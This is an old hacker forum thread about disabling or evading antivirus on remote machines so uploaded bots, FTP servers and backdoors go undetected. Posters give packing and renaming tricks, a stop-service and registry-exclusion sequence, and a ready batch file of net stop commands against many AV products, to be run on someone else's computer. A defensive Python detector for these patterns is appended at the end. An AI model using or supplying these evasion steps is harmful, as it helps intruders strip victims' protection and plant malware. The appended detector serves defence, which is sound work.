Yosam
Sep 16 2003, 04:17 PM
Hi, I remember GSecur posted once how to disable or bypass an anti-virus
on a remote machine. I tried to search for it but no luck.
Does anyone know how I can make the anti-virus not alert
about the files I upload to the remote machine?
Thanks in advance.
Certox
Sep 17 2003, 03:35 AM
I just rename the ext. I am guessing ur trying to put up a ftp and iroffer. And lots of anti-virus will delete it, so just name it iroffer.ex and servu.ex, then modify ur bat to read them. If you can get ur ftp up reg just do that, and if you are having problems getting ur bat to start the bot just do: site exec iroffer.ex -b xdcc.config
It will start right up

Of course I don't mean for you to do anything illegal, so when trying to bypass your own anti-virus on your own computer, do that.
Jeeve5
Sep 17 2003, 11:06 AM
Hi
The way I usually do it is:
1. stop the AV service
2. upload a registry hack that tells the AV to exclude all files in the dir you up your kit to
3. regedit /s patch.reg
4. restart the AV service
Usually works. Only exception I found is OfficeScan NT. Thing to do there is modify the exclude filenames to yourprog1.exe and yourprog2.exe
Hope that helped,
Jeeve5
Imps2
Sep 17 2003, 12:34 PM
Use a packer and rename u'r file or kill the AV
net stop Mcshield
net stop "Norton Antivirus Service"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "McAfee Framework Service"
Greetz Imps2
Yosam
Sep 17 2003, 12:38 PM
What is a packer exactly?
What file are you talking about?
Can I just put this "code" that u gave me into a bat file
and run it on the machine?
Jeeve5
Sep 17 2003, 12:47 PM
The most common packer is UPX.
The 'code' he just gave you is to stop the AV services. Problem is that Norton usually recognizes packed files and therefore it is useless.
Yosam
Sep 17 2003, 12:49 PM
OK, but I didn't understand your method.
What is a registry hack?
Where can I find it?
Imps2
Sep 17 2003, 12:50 PM
A packer changes the size of u'r proggie and renames it so it's harder to detect by AV software.
You should be able to run the commands from a bat file
Greetz Imps2
miezmiez
Jan 31 2004, 03:31 PM
Link to test your files online:
http://www.kaspersky.com/de/remoteviruschk.html
and the results are horrible:
Zu überprüfende Datei: server_.exe
server_.exe Komprimiert: ASPack
server_.exe Komprimiert: ASPack
server_.exe Komprimiert: Morphine
server_.exe Komprimiert: UPX
server_.exe Infiziert: Backdoor.Winshell.50
Kaspersky knows all known exe packers and has the depacker, I think ...
Does anybody have an unknown packer ???
Reaper527
Jan 31 2004, 06:48 PM
Put the following code into av.bat
| CODE |
@echo off
net stop AVP32
net stop LOCKDOWN2000
net stop AVP.EXE
net stop CFINET32
net stop CFINET
net stop ICMON
net stop SAFEWEB
net stop WEBSCANX
net stop ANTIVIR
net stop MCAFEE
net stop NORTON
net stop NVC95
net stop FP-WIN
net stop IOMON98
net stop PCCWIN98
net stop F-PROT95
net stop F-STOPW
net stop PVIEW95
net stop NAVWNT
net stop NAVRUNR
net stop NAVLU32
net stop NAVAPSVC
net stop NISUM
net stop SYMPROXYSVC
net stop RESCUE32
net stop NISSERV
net stop ATRACK
net stop IAMAPP
net stop LUCOMSERVER
net stop LUALL
net stop NMAIN
net stop NAVW32
net stop NAVAPW32
net stop VSSTAT
net stop VSHWIN32
net stop AVSYNMGR
net stop AVCONSOL
net stop WEBTRAP
net stop POP3TRAP
net stop PCCMAIN
net stop PCCIOMON
|
It's a list I got from a friend. Basically just put that bat file on their comp and run it and it will attempt to stop a whole bunch of different AVs; odds are whatever they use is on that list somewhere.
LittleHacker
Feb 1 2004, 01:01 AM
Useful list.
I add AVG Antivirus by Grisoft. Services are
| QUOTE |
avgamsrv.exe : AVG Alert Manager
avgcc.exe : AVG Control Center
avgemc.exe : AVG E-mail Scanner
|
and warn you about a VxD it uses. It will work even if you kill all these processes!
Trojan^kid
Feb 1 2004, 01:18 PM
Packers are a good choice to bypass Norton and other antivirus.
McAfee and ksv, I think hex edit is the only one.
Cheers
--Elite--
Feb 2 2004, 07:16 PM
Your complete answer. Seems the members completed my post enough to help ...
globe7
Feb 2 2004, 11:51 PM
I love the easy way:
look at the service list
and stop the anti-virus (:
bjoernfun
Feb 3 2004, 07:50 AM
Heya,
@Jeeve5 can you post the registry hack, so the AV will exclude the directory!
thanks
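
Added example, not part of any post in this thread: from the defender's side, the behaviours described above (a burst of `net stop` attempts from a batch file, and the stop / `regedit /s` / restart sequence) are visible in process-creation logging such as Windows Event ID 4688 or Sysmon Event ID 1. The sketch below runs that detection over constructed records; the record layout, host names, thresholds and rule names are assumptions.

```python
import re
from collections import defaultdict

# Security service names quoted in the thread; extend with your own products.
WATCHED = {"mcshield", "norton antivirus service", "panda antivirus",
           "zonealarm", "mcafee framework service", "navapsvc"}
NET_RE = re.compile(r'\bnet1?(?:\.exe)?"?\s+(stop|start)\s+"?([^"]+?)"?\s*$', re.I)
REG_RE = re.compile(r'\bregedit(?:\.exe)?"?\s+/s\s+\S', re.I)
BURST, WINDOW = 3, 60  # assumed thresholds: 3 stop attempts within 60 seconds

def detect(events):
    """events: time-ordered (epoch_seconds, host, command_line) tuples.
    Returns a list of (host, rule) alerts."""
    alerts, stops, state = [], defaultdict(list), {}
    for ts, host, cmd in events:
        m = NET_RE.search(cmd)
        if m:
            verb, svc = m.group(1).lower(), m.group(2).strip().lower()
            if verb == "stop":
                if svc in WATCHED:
                    alerts.append((host, "av_service_stop"))
                    state[host] = ("stopped", ts)
                # Any run of stop attempts counts, even for unknown names:
                # a blind list tries many services that do not exist.
                recent = [t for t in stops[host] if ts - t <= WINDOW] + [ts]
                stops[host] = recent
                if len(recent) == BURST:
                    alerts.append((host, "service_stop_burst"))
            elif svc in WATCHED and state.get(host, ("",))[0] == "imported":
                alerts.append((host, "stop_import_restart_sequence"))
                state.pop(host)
        elif REG_RE.search(cmd):
            # Silent .reg import; escalate if it follows an AV service stop.
            alerts.append((host, "silent_reg_import"))
            if state.get(host, ("", 0))[0] == "stopped" and ts - state[host][1] <= 5 * WINDOW:
                state[host] = ("imported", ts)
    return alerts

SAMPLE = [  # constructed process-creation records, not real telemetry
    (100, "ws01", "net stop Mcshield"),
    (104, "ws01", "regedit /s patch.reg"),
    (109, "ws01", "net start Mcshield"),
    (200, "ws02", "net stop AVP32"),
    (201, "ws02", "net stop LOCKDOWN2000"),
    (202, "ws02", 'net stop "Norton Antivirus Service"'),
    (300, "ws03", "net stop Spooler"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Pair this with alerting on changes to the AV product's exclusion settings and with tamper protection, so that a service stop or exclusion edit by a non-management process is both blocked and reported.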